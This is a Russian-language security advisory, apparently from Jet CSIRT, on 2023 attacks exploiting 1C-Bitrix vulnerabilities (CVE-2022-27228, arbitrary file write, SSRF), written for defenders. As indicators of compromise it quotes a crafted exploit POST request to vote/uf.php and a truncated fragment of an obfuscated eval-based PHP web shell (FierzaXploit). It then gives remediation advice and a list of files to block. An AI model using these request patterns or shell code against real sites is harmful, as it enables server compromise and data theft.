1. Описание зафиксированной угрозы 

[Название угрозы]: Множественные атаки на CMS Bitrix RU-сегмента сети Интернет

[Тип угрозы]: утечки данных, кибератаки

[Platform]: CMS Bitrix

[Product]: 1С-Битрикс: Управление сайтом

[Version]: до 22.0.400

[Severity]: High

[Дата обнаружения]: 06/2023

С начала июня 2023 года был зафиксирован ряд инцидентов ИБ, связанных с кибератаками на российский сегмент сети Интернет, в частности, в отношении сайтов, использующих CMS Bitrix.

2. Технические детали угрозы

2.1 Сведения об уязвимостях

Злоумышленники активно эксплуатируют уязвимости платформы CMS Bitrix (уязвимы версии до 22.0.400):

Arbitrary Object Instantiation (CVE-2022-27228)

Описание из Банка данных угроз:

Использование уязвимости модуля «vote» системы управления содержимым сайтов (CMS) «1С-Битрикс: Управление сайтом» позволяет отправлять специально сформированные сетевые пакеты: нарушитель может удаленно записать произвольные файлы в уязвимую систему.

Уязвимый модуль: vote/uf.php

Arbitrary File Write

Тип уязвимости, которая позволяет злоумышленнику загружать вредоносные файлы на сервер. Модуль «html_editor_action.php» является частью визуального HTML-редактора, в котором происходит работа с изображениями, ссылками, файлами и т. д.

Уязвимый модуль: html_editor_action.php

Server-Side Request Forgery

Подделка запроса на стороне сервера — это атака, которая позволяет отправлять запросы от имени сервера к внешним или внутренним ресурсам. При этом злоумышленник может контролировать либо весь запрос целиком, либо его отдельные части.

Уязвимый модуль: html_editor_action.php

2.2 Сведения об атаках

Эксплуатация описанных уязвимостей приводит к исполнению произвольного кода PHP, вследствие чего возможно построение дальнейшего вектора атаки на сервер, включая исполнение кода командной оболочкой ОС. Злоумышленники загружают на сайт вредоносное программное обеспечение типа веб-шелл: эта командная оболочка используется для управления сервером с помощью команд. Благодаря ей злоумышленники достигают разных целей: выгрузка данных с атакованного ресурса, дефейс сайта, повреждение данных и др.

По результатам расследований, проведенных специалистами Jet CSIRT, было выявлено, что злоумышленники получили доступ к уязвимым системам за 3-6 месяцев до публикации полученных данных в Telegram-каналах и DarkNet форумах.

2.3 Сведения об используемом ВПО и индикаторах компрометации

Попытки эксплуатации уязвимостей можно обнаружить в журналах веб-сервера, так как уязвимость заключается в некорректной обработке пользовательских данных в POST-запросах.

Примеры запросов, на которые необходимо обратить внимание:

POST /bitrix/tools/vote/uf.php?attachId[ENTITY_TYPE]=CFileUploader&attachId[ENTITY_ID][events][onFileIsStarted][]=CAllAgent&attachId[ENTITY_ID][events][onFileIsStarted][]=Update&attachId[MODULE_ID]=vote&action=vote HTTP/1.0
POST /bitrix/tools/html_editor_action.php HTTP/1.0

Следует также обратить внимание на файлы со сгенерированным (не словарным) наименованием.

Пример запросов обращения злоумышленников к веб-шелл, обнаруженных в логах:

GET /81920ba2a5fe.php HTTP/1.0

Примеры обнаруженных вредоносных файлов в ходе расследований:

Кроме того, в некоторых случаях веб-шелл могут маскировать под легитимные модули и скрипты. Например, в ходе расследований Jet CSIRT установлены следующие имена файлов, которые использовались злоумышленниками:

Значительная часть выявленного вредоносного программного обеспечения представляет собой веб-шелл со следующими функциями:

• сбор информации о сервере (версия ОС, информация о пользователях, установленное ПО и модули);
• функции файлового менеджера для просмотра директорий сервера, загрузки и выгрузки файлов;
• функции по работе с базами данных.

Некоторые образцы вредоносного программного обеспечения используют методы обфускации для усложнения детектирования при сканировании антивирусными средствами.

Например, образец 13005.php, обнаруженный в одном из расследований, содержит следующие данные:

<?=/*!*/@/**8**/null; echo@null;goto O4809;O6131:$O8797='o';goto O5881;O7094:$O5319='n';goto O4845;O8585:$O1333='f';goto O9593;O5239:$O3361=$O5305.$O9000.$O4994.$O5319.$O1333.$O8539.$O8018.$O3314.$O4387;goto O2817;O3463:$O9000='z';goto O9339;O5881:$O9366='v';goto O6846;O2817:$O7244=$O9467.$O8018.$O7407.$O4387.$O1860.$O9137.$O9705.$O2275.$O4387.$O0763.$O8797.$O2275.$O4387;goto O8251;O0032:$O4994='i';goto O3463;O3774:$O9705='_';goto O7261;O6231:$O9467='b';goto O2749;O4157:$O8539='l';goto O7032;O2749:$O8018='a';goto O3774;O9593:$O4387='e';goto O3270;O7378:$O1860='6';goto O6131;O7261:$O6447=$O7407.$O3314.$O5781.$O5781.$O4387.$O9366;goto O5239;O9490:$O3314='t';goto O6231;O6846:$O9137='4';goto O7094;O3270:$O2275='d';goto O9490;O4809:$O5305='g';goto O0032;O4845:$O7407='s';goto O4157;O9339:$O0763='c';goto O7378;O7032:$O5781='r';goto O8585;O8251:eval($O3361($O6447($O7244('B/9/7/vv+f8/0IZz8hR+qZBNt/PMclswFbY5R1EXiEwKMS9wqucGe9191KNlEh75kfqFH7tUjvb5Z22...

Для деобфускации потребуется несколько раундов функций gzinflate, strrev, base64_decode, htmlspecialchars_decode, str_rot13. После декодирования данного образца установлено, что данный веб-шелл является экземпляром FierzaXploit Shell v1.3. Помимо стандартных функций, для данного типа ВПО выявлены следующие отличительные особенности:

• В качестве защиты ВПО всегда возвращает ошибку 404, также имеет защиту от индексации по User-Agent
  http_response_code(404)
• ВПО обладает встроенной системой обновлений, а также проверяет наличие файла
  https://github.com/FierzaEriez/FierzaEriez.github.io/blob/main/FX-Backdoor(1.4).php
• В ВПО встроен функционал массового дефейса, удаления файлов, сканирования портов и т. д.
• Часть кода ВПО представлена на индонезийском (малайском) языке
• Отдельный модуль ВПО отслеживает заряд батареи ноутбука пользователя
• ВПО использует в своем составе библиотеку sweetalert2, которая при подключении на сайтах в доменах .ru|.su|.by|.рф включает гимн Украины и блокирует взаимодействие с элементами на странице

IOC [md5]:

3. Рекомендации по устранению

1. Произвести обновление CMS до актуальной стабильной версии (как минимум как до версии 22.0.400).

2. Произвести обновление PHP до актуальной стабильной версии.

3. Провести проверку файловой системы сервера CMS на предмет наличия подозрительных файлов: для проверки использовать антивирусное решение в режиме максимальной эвристики. При обнаружении подозрительных файлов их нужно проанализировать и при отсутствии необходимости данных файлов для обеспечения функционирования CMS или веб-приложения — удалить. Для проведения подробного исследования необходимо сохранить копию подозрительных файлов.

4. Рекомендуется выполнить проверку веб-приложения посредством специализированного сканера уязвимостей, доступного по ссылке https://marketplace.1c-bitrix.ru/solutions/bitrix.xscan/.

5. Необходимо рассмотреть возможности по закрытию доступа к следующим файлам на уровне сервера (например, в .htaccess):

• /bitrix/tools/upload.php
• /bitrix/tools/mail_entry.php
• /bitrix/modules/main/include/virtual_file_system.php
• /bitrix/components/bitrix/sender.mail.editor/ajax.php
• /bitrix/tools/vote/uf.php
• /bitrix/tools/html_editor_action.php
• /bitrix/admin/site_checker.php

6. Следует проверить уровень журналирования событий веб-сервера и баз данных, оценить содержимое журналов событий на наличие подозрительных событий, таких как доступ к уязвимым модулям, неизвестным файлам.

7. Рассмотреть возможность применения решений класса Web Application Firewall (WAF) для защиты веб-приложений.

4. Ссылки

• https://bdu.fstec.ru/vul/2022-01141

• https://github.com/cr1f/writeups [attacking_bitrix.pdf]

• https://www.1c-bitrix.ru/about/news/17891178/